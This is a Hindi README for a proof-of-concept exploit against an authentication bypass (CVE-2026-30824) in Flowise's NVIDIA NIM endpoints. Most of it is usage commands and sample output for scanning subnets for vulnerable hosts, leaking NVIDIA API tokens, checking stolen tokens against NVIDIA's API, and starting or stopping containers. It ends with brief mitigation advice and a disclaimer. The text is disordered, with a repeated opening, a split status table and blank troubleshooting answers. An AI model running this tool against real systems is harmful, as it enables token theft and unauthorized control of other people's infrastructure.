
**CVE-2026-30824** के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Flowise में एक गंभीर प्रमाणीकरण बायपास भेद्यता है, जो बिना प्रमाणीकरण के NVIDIA NIM API एंडपॉइंट्स को उजागर करती है।
CVE-2026-30824 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट जाँचकर्ता और एक्सप्लॉइट, जो Flowise में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है जो बिना प्रमाणीकरण के NVIDIA NIM API एंडपॉइंट्स को उजागर करती है।
CVE-2026-30824 Flowise (< 3.0.13) में एक गंभीर प्रमाणीकरण बाईपास है जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को NVIDIA NIM कंटेनर प्रबंधन और API टोकन जनरेशन एंडपॉइंट्स तक पहुंचने की अनुमति देता है।
| फ़ील्ड | मान |
|---|---|
| CVSS स्कोर | 9.8 (गंभीर) |
| CWE | CWE-306: महत्वपूर्ण फ़ंक्शन के लिए प्रमाणीकरण की कमी |
| प्रभावित संस्करण | Flowise < 3.0.13 |
| प्रभाव | पूर्ण कंटेनर प्रबंधन, GPU पहुंच, टोकन चोरी |
/api/v1/nvidia-nim/* पथ वैश्विक प्रमाणीकरण मिडलवेयर में व्हाइटलिस्टेड है, जो बिना प्रमाणीकरण के निम्न तक पहुंच की अनुमति देता है:
✅ भेद्यता पहचान — त्वरित जाँच कि लक्ष्य भेद्य है या नहीं
✅ टोकन निष्कर्षण — भेद्य एंडपॉइंट्स से NVIDIA API टोकन लीक करें
✅ टोकन सत्यापन — NVIDIA API के विरुद्ध टोकन सत्यापित करें (विस्फोट त्रिज्या प्रदर्शित करें)
✅ कंटेनर गणना — चल रहे NIM कंटेनरों की सूची बनाएं
✅ बैच स्कैनिंग — फ़ाइल से कई लक्ष्यों को स्कैन करें
✅ SSL बाईपास — डिफ़ॉल्ट रूप से स्व-हस्ताक्षरित प्रमाणपत्रों को अनदेखा करें
✅ रंगीन आउटपुट — आसानी से पढ़ने योग्य स्थिति संकेतक (हरा/पीला/लाल)
✅ टोही — पूर्ण एंडपॉइंट मैपिंग और डायग्नोस्टिक्स
requests लाइब्रेरी# स्क्रिप्ट को क्लोन या डाउनलोड करें
git clone <repository>
cd cve-2026-30824
# निर्भरताएँ स्थापित करें
pip install -r requirements.txt
# या
pip install requests
# जाँचें कि एकल लक्ष्य भेद्य है या नहीं
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check
# अपेक्षित आउटपुट (भेद्य):
# [+] लक्ष्य भेद्य प्रतीत होता है (HTTP 200)
# प्रतिक्रिया: {...}
# प्रति पंक्ति एक URL के साथ targets.txt बनाएं
cat > targets.txt << EOF
http://192.168.1.100:3000
http://192.168.1.101:3000
http://192.168.1.102:3000
EOF
# सभी लक्ष्यों को स्कैन करें (तेज़ मोड, कोई संकेत नहीं)
python3 CVE-2026-30824.py -f targets.txt --scan-only
# अपेक्षित सारांश आउटपुट:
# ============================================================
# [*] स्कैन सारांश
# ============================================================
# [+] भेद्य: 2
# ✓ http://192.168.1.100:3000
# ✓ http://192.168.1.101:3000
# [-] पैच किया गया: 1
# ✗ http://192.168.1.102:3000
# भेद्य एंडपॉइंट से NVIDIA API टोकन लीक करें
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token
# अपेक्षित आउटपुट:
# [*] NVIDIA API टोकन लीक करने का प्रयास...
# [+] NVIDIA API टोकन: eyJ0eXAiOiJKV1QiLCJhbGc...
# [+] टोकन प्रकार: Bearer
# [+] समाप्ति: 3600s
# सत्यापित करें कि लीक किया गया टोकन वास्तविक NVIDIA API के विरुद्ध काम करता है
python3 CVE-2026-30824.py --validate-token "eyJ0eXAiOiJKV1QiLCJhbGc..."
# अपेक्षित आउटपुट:
# [*] NVIDIA API के विरुद्ध टोकन सत्यापित करना...
# [+] टोकन मान्य! 45 NVIDIA NIM मॉडल तक पहुंच।
# - mistralai/mistral-7b-instruct-v0.1
# - meta-llama/llama2-70b
# - (...)
# लक्ष्य पर कंटेनरों की गणना करें
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --list-containers
# अपेक्षित आउटपुट:
# [*] चल रहे कंटेनरों की सूची बनाना...
# [+] HTTP 200
# [
# {
# "id": "abc123xyz",
# "names": ["flowise_nim"],
# "image": "nvcr.io/nvidia/nim:latest",
# "state": "running"
# }
# ]
# भेद्य लक्ष्य पर सभी टोही जाँचें चलाएं
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all
usage: CVE-2026-30824.py [-h] [-t TARGET] [-f TARGETS_FILE] [--check]
[--scan-only] [--get-token]
[--validate-token TOKEN] [--list-containers]
[--get-container CONTAINER_ID]
[--get-image IMAGE_ID] [--pull-image IMAGE_TAG]
[--start-container IMAGE_TAG]
[--container-name CONTAINER_NAME]
[--stop-container CONTAINER_ID] [--preload]
[--all] [--timeout TIMEOUT] [--debug]
वैकल्पिक तर्क:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
-t, --target TARGET लक्ष्य URL (जैसे, http://192.168.1.100:3000)
-f, --targets-file FILE लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
भेद्यता पहचान:
--check केवल जाँचें कि लक्ष्य भेद्य है या नहीं
--scan-only बिना संकेतों के भेद्यता के लिए लक्ष्यों को स्कैन करें
--debug अनुरोध विवरण और कच्ची प्रतिक्रियाएँ दिखाएं
शोषण:
--get-token NVIDIA API टोकन लीक करें
--validate-token TOKEN NVIDIA API के विरुद्ध लीक किए गए टोकन को सत्यापित करें
--list-containers चल रहे NIM कंटेनरों की सूची बनाएं
--get-container CONTAINER_ID कंटेनर विवरण प्राप्त करें
--get-image IMAGE_ID इमेज विवरण प्राप्त करें
--pull-image IMAGE_TAG Docker इमेज पुल करें (जैसे, nvcr.io/nvidia/nim:latest)
--start-container IMAGE_TAG इमेज टैग से कंटेनर प्रारंभ करें
--container-name NAME प्रारंभ किए गए कंटेनर के लिए नाम
--stop-container CONTAINER_ID चल रहे कंटेनर को रोकें
--preload संसाधन प्रीलोड एंडपॉइंट ट्रिगर करें
--all सभी टोही जाँचें चलाएं
उन्नत:
--timeout SECONDS अनुरोध टाइमआउट सेकंड में (डिफ़ॉल्ट: 15)
# 1. भेद्य इंस्टेंस के लिए पूरे सबनेट को स्कैन करें
python3 CVE-2026-30824.py -f internal_ips.txt --scan-only
# 2. प्रत्येक भेद्य लक्ष्य के लिए, टोकन निकालें
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token
# 3. टोकन प्रभाव सत्यापित करें
python3 CVE-2026-30824.py --validate-token "<extracted-token>"
# भेद्यता सत्यापित करें और पूर्ण विस्फोट त्रिज्या प्रदर्शित करें
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all
# यह करेगा:
# 1. भेद्यता जाँचें
# 2. NVIDIA API टोकन निकालें
# 3. NVIDIA API के विरुद्ध टोकन सत्यापित करें
# 4. चल रहे कंटेनरों की सूची बनाएं
# 5. संसाधन गणना दिखाएं
# लक्ष्य की समय-समय पर निगरानी करें (cron या शेड्यूलर के माध्यम से)
python3 CVE-2026-30824.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log
| HTTP | अर्थ |
|---|---|
| 200 | ✅ भेद्य (एंडपॉइंट सुलभ) |
| 400 | ✅ भेद्य (एप्लिकेशन त्रुटि लेकिन एंडपॉइंट मौजूद है) |
| 401 |
समस्या: एंडपॉइंट JSON API प्रतिक्रिया के बजाय HTML पृष्ठ लौटाता है।
समाधान:
समस्या: लक्ष्य तक नहीं पहुंच सकते।
समाधान:
# कनेक्टिविटी का परीक्षण करें
curl -v http://192.168.1.100:3000/
# टाइमआउट बढ़ाएं
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check --timeout 30
समस्या: लक्ष्य स्व-हस्ताक्षरित या समाप्त प्रमाणपत्र का उपयोग करता है।
समाधान: स्क्रिप्ट डिफ़ॉल्ट रूप से SSL सत्यापन अक्षम करती है। यदि समस्याएँ बनी रहती हैं:
# स्पष्ट रूप से पोर्ट और प्रोटोकॉल जोड़ें
python3 CVE-2026-30824.py -t https://192.168.1.100:3000 --check
समस्या: टोकन निकाला गया लेकिन NVIDIA API के विरुद्ध सत्यापन विफल।
कारण:
⚠️ कानूनी नोटिस
यदि आप इस भेद्यता को वास्तविक दुनिया में खोजते हैं:
तत्काल:
दीर्घकालिक:
/api/v1/nvidia-nim/* पथों को ब्लॉक करने के लिए WAF नियमों का उपयोग करेंयह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। विवरण के लिए LICENSE फ़ाइल देखें।
यह एक्सप्लॉइट बिना किसी वारंटी के "जैसा है" प्रदान किया गया है। केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
अधिकृत पैठ परीक्षण और सुरक्षा अनुसंधान के लिए बनाया गया।
अंतिम अद्यतन: अप्रैल 2026
| 🟡 पैच किया गया (प्रमाणीकरण आवश्यक) |
| 404 | 🟡 Flowise नहीं या एंडपॉइंट मौजूद नहीं है |
| 5xx | 🔴 सर्वर त्रुटि/गलत कॉन्फ़िगरेशन |